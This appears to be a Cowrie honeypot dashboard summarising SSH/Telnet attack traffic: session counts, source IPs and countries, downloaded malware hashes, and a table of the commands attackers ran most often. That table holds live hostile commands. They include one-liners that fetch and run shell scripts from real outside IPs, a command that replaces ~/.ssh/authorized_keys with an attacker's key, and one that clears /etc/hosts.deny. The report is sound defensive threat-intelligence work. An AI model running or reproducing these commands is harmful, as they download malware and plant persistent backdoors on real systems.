Cowrie Honeypot Analysis

Data collected from a Cowrie SSH/Telnet honeypot. Last updated: 2025-06-20 02:00:15

[Chart: Connections Over Time]
Total Sessions: 347197
Unique IP Addresses: 7890
Commands Executed: 177283
Downloaded Files: 15
Attack Infrastructure
Data Center: 3598
VPN/Proxy: 1219
Tor Exit Node: 10
Unknown: 138
Residential: 1321
Mobile: 378
Education: 237
Corporate: 989
Attack Risk Metrics
Known Attackers: 5775
Suspicious IPs: 816
Files Downloaded: 15
Login Success Rate: 60.6%
[Chart: Source IP Reputation]
[Chart: Countries - Top 10]
[Chart: Connection Types]
Note: 1.7% of connections could not be classified
Recent Attacks
| Session ID | IP Address | Country | Connection Type | Timestamp | Duration | Commands |
|---|---|---|---|---|---|---|
| 7ad5116cb598 | 115.247.46.121 | India | Data Center | 2025-06-20 02:00:10 | 0.44s | 0 |
| 5d3a264b7395 | 80.94.95.15 | Romania | VPN/Proxy | 2025-06-20 02:00:09 | 6.34s | 0 |
| 2432cd01f508 | 193.70.87.152 | France | Data Center | 2025-06-20 01:58:54 | 1.47s | 0 |
| 860b666d5faf | 5.255.100.18 | The Netherlands | VPN/Proxy | 2025-06-20 01:58:35 | 14.38s | 0 |
| 7dcab99913da | 5.78.139.241 | United States | VPN/Proxy | 2025-06-20 01:57:51 | 0.40s | 0 |
| 1c13e17e2d07 | 5.255.100.18 | The Netherlands | VPN/Proxy | 2025-06-20 01:56:29 | 5.84s | 0 |
| 65b2b2726669 | 193.70.87.152 | France | Data Center | 2025-06-20 01:55:27 | 1.47s | 0 |
| b899bee23acd | 5.255.100.18 | The Netherlands | VPN/Proxy | 2025-06-20 01:54:16 | 12.50s | 0 |
| ab6b3020d7aa | 5.255.100.18 | The Netherlands | VPN/Proxy | 2025-06-20 01:52:12 | 6.73s | 0 |
| 1298620e30b1 | 193.70.87.152 | France | Data Center | 2025-06-20 01:51:54 | 0.49s | 0 |
Recent File Downloads
| SHA256 Hash | Filename | Source IP | Country | VirusTotal | First Seen |
|---|---|---|---|---|---|
| d32dae7719d18880... | honeypot_test_file.txt | 195.178.110.160 | Bulgaria | 0/62 | 2025-06-18 10:42:57 |
| 4355a46b19d348dc... | null | 47.83.124.121 | Hong Kong | 0/62 | 2025-06-18 01:08:43 |
| 16174ef4d82f50eb... | gay.sh | 141.98.10.162 | Lithuania | 24/61 | 2025-06-18 00:01:57 |
| 791589bc3cc5657d... | ssh.sh | 141.98.10.162 | Lithuania | 25/62 | 2025-06-17 17:34:48 |
| a17fcf0a2f50e2d4... | real.txt | 176.88.3.62 | Türkiye | 0/62 | 2025-06-15 17:02:24 |
Top Commands
Command Count
echo -e "\x6F\x6B" 133953
cd ~; chattr -ia .ssh; lockr -ia .ssh 14402
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ 14397
uname -s -v -n -r -m 8610
uname -s -v -n -r 590
(nproc; uname -a) |tr '\n' '|' 581
nproc ; uname -a 581
cd /tmp; wget http://213.209.143.44/ssh.sh -O- |sh;curl -o http://213.209.143.44/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh;\n 356
cd /tmp; wget http://5.255.121.213/gay.sh -O- |sh;curl -o http://5.255.121.213/gay.sh -O-|sh; tftp -r gay.sh -g 5.255.121.213; chmod 777 gay.sh; sh gay.sh;\n 350
uname -a 259
cd /tmp; wget http://107.150.0.18/ssh.sh -O- |sh;curl -o http://107.150.0.18/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh;\n 139
uname -s -m 122
cat /proc/cpuinfo | grep name | wc -l 110
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; 105
whoami 104
Top IP Addresses
| IP Address | Country | Count |
|---|---|---|
| 162.246.19.141 | United States | 300022 |
| 47.240.63.58 | Hong Kong | 259509 |
| 123.31.24.56 | Vietnam | 256094 |
| 47.83.132.218 | Hong Kong | 184152 |
| 31.145.191.148 | Türkiye | 63013 |
| 47.242.92.52 | Hong Kong | 60083 |
| 189.230.168.139 | Mexico | 31280 |
| 196.251.84.225 | The Netherlands | 28817 |
| 8.219.119.151 | Singapore | 27604 |
| 104.248.40.189 | Germany | 14015 |
Top Countries
| Country | Count |
|---|---|
| United States | 1871 |
| India | 559 |
| Hong Kong | 491 |
| South Korea | 439 |
| Singapore | 365 |
| Russia | 296 |
| Germany | 279 |
| Indonesia | 228 |
| Malaysia | 220 |
| France | 212 |
Visualizations
[Chart: Top Usernames]
[Chart: Top Passwords]
[Chart: Login Success vs. Failure]
[Chart: Top Commands]
[Chart: Session Durations]
[Chart: Top Source IPs]